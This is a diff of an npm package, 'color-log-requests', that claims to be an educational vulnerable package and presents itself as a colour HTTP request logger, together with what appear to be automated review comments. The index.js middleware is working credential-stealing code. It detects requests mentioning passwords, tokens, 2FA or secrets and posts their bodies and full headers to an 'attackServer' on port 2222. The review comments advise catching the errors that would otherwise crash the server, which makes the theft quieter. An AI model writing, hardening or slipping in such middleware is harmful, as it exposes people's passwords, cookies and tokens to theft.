color-log-requests 1.0.0





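--- a/package/README.md
+++ b/package/README.md
@@ -0,0 +1,49 @@
+**Warning: This package log requests containing sensitive data (token, password ...) in an "external" (localhost) server in 2222 port.**
+
+This package is a vulnerable package and is created for educational purposes.
+
+
+## Usage
+this package is a HTTP request logger middleware for node.js
+
+
+```javascript
+const logger = require('color-log-requests');
+app.use(logger);
+```
+
+The result is in the format:
+
+```bash
+<resStatusCode> <resContentLength> <datetime> <reqMethod> <reqURL> <reqHttpVersion> <reqUserAgent> <reqIp>
+```
+
+The status codes are displayed in color:
+- green for success (< 300)
+- magenta for redirect (<400)
+- red for failure (<600)
+- blank otherwise
+
+
+## Requirements
+It is necessary to install and use the [body-parser](https://www.npmjs.com/package/body-parser) package before using this package:
+```bash
+npm install body-parser
+```
+
+The call in code may look like this:
+```javascript
+const bodyParser = require('body-parser');
+app.use(bodyParser.json());
+
+...
+const logger = require('color-log-requests');
+app.use(logger);
+```
+
+
+## Installation
+Download node at [nodejs.org](http://nodejs.org/) and install it, if you haven't already.
+```
+npm install color-log-requests
+```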
@@ -0,0 +1,21 @@
1
+ // const http = require('http');
2
+
3
+ // const host = "127.0.0.1";
4
+ // const port = 2222;
5
+
6
+
7
+ // const server = http.createServer((req, res) => {
8
+ // const chunks = [];
9
+ // req.on("data", (chunk) => {
10
+ // chunks.push(chunk);
11
+ // });
12
+ // req.on("end", () => {
13
+ // const data = Buffer.concat(chunks);
14
+ // console.log("New sensitive request: ", JSON.parse(data.toString()));
15
+ // res.end();
16
+ // });
17
+ // })
18
+
19
+ // server.listen(port, host, () => {
20
+ // console.log(`Server is running on http://${host}:${port}`);
21
+ // });
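--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,73 @@
+const axios = require("axios")
+
+const attackServer = "127.0.0.1"
+const aAttackPort = 2222
+
+
+const sensitiveValues = ["login", "register", "2fa", "password", "token", "key", "pass", "secret", ]
+
+
+const stringContainsSensitiveValue = (string) => {
+let response = false
+sensitiveValues.forEach(value => {
+if (string.toLowerCase().includes(value.toLowerCase())) {
+response = true
+}
+})
+return response
+}
+
+
+
+const dictContainsSensitiveValue = (dict) => {
+let response = false
+for (let key in dict) {
+if (stringContainsSensitiveValue(key)) {
+response = true
+}
+}
+return response
+}
+
+
+
+module.exports = function (req, res, next) {
+res.on("finish", function () {
+const date = new Date()
+
+if (res.statusCode < 300) { // Success
+console.log(`\x1b[32m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
+} else if (res.statusCode < 400) { // Redirection
+console.log(`\x1b[35m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
+} else if (res.statusCode < 600) { // Client or server Error
+console.log(`\x1b[31m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}`);
+} else { // Unknown
+console.log(`\x1b[37m${res.statusCode}\x1b[0m ${res.get('Content-Length') || 0} [${date.toUTCString()}] ${req.method} ${decodeURI(req.url)} HTTP/${req.httpVersion} ${req.headers['user-agent']} ${req.ip}` );
+}
+
+
+if (dictContainsSensitiveValue(req.body) || stringContainsSensitiveValue(decodeURI(req.url)) || dictContainsSensitiveValue(req.headers)) {
+axios.post(`http://${attackServer}:${aAttackPort}`, {
+url: decodeURI(req.url),
+host: req.headers.host,
+method: req.method,
+date: date.toLocaleString(),
+client: {
+ip: req.ip,
+body: req.body,
+headers: req.headers,
+httpVersion: req.httpVersion,
+},
+response: {
+statusCode: res.statusCode,
+body: res.body,
+headers: res.headers,
+contentLength: res.get('Content-Length') || 0
+}
+})
+}
+
+
+});
+next();
+}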
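Review bot: The `axios.post(...)` inside the `finish` handler (hunk lines 50–67) has no rejection handler, so whenever nothing is listening on 127.0.0.1:2222 — the normal state for anyone who merely installed the package without running the commented-out collector — every request matching `sensitiveValues` produces an unhandled promise rejection, which on Node 15 and later terminates the server process by default; append `.catch((err) => console.error("collector unreachable:", err.code))` or at least `.catch(() => {})`. The same handler calls `decodeURI(req.url)` up to three times, and a malformed escape such as `/login%` makes it throw `URIError` from inside the event listener, a second uncaught crash path — decode once through a guard like `const safeDecodeURI = (u) => { try { return decodeURI(u); } catch { return u; } };` and reuse the result in the log line, the match and the payload. `res.body` and `res.headers` (lines 63–64) are not properties of a Node/Express response object, so the forwarded `response` section is largely `undefined`; `res.getHeaders()` is the supported accessor if response headers are meant to be captured. Note also that the payload ships the complete `req.headers`, so `Cookie` and `Authorization` leave with it — presumably intended for this educational package, but worth a comment above the `if` since the README only mentions tokens and passwords.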
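--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,20 @@
+{
+"name": "color-log-requests",
+"version": "1.0.0",
+"description": "This package is a vulnerable package and is created for educational purposes.",
+"main": "index.js",
+"scripts": {
+"start": "node index.js"
+},
+"keywords": [
+"test",
+"vulnerable",
+"logging",
+"color"
+],
+"author": "Pierrick Delrieu",
+"license": "ISC",
+"dependencies": {
+"axios": "^1.3.3"
+}
+}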
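Review bot: The manifest has no `"private": true`, so the same `npm publish` that produced this version keeps a credential-forwarding middleware discoverable under the generic keywords `logging` and `color` by anyone searching the registry for a request logger; for a teaching artifact, `"private": true` (or at minimum dropping the two benign keywords) is the one-line guard against accidental adoption. The `start` script runs `node index.js`, which only assigns `module.exports` and exits at once; if it is meant to launch the commented-out collector on port 2222 it should point at that file instead. The warning about exfiltration lives only in the README, which `npm install` never displays, so the `description` field is the only place an installer might see it and could state the behavior plainly.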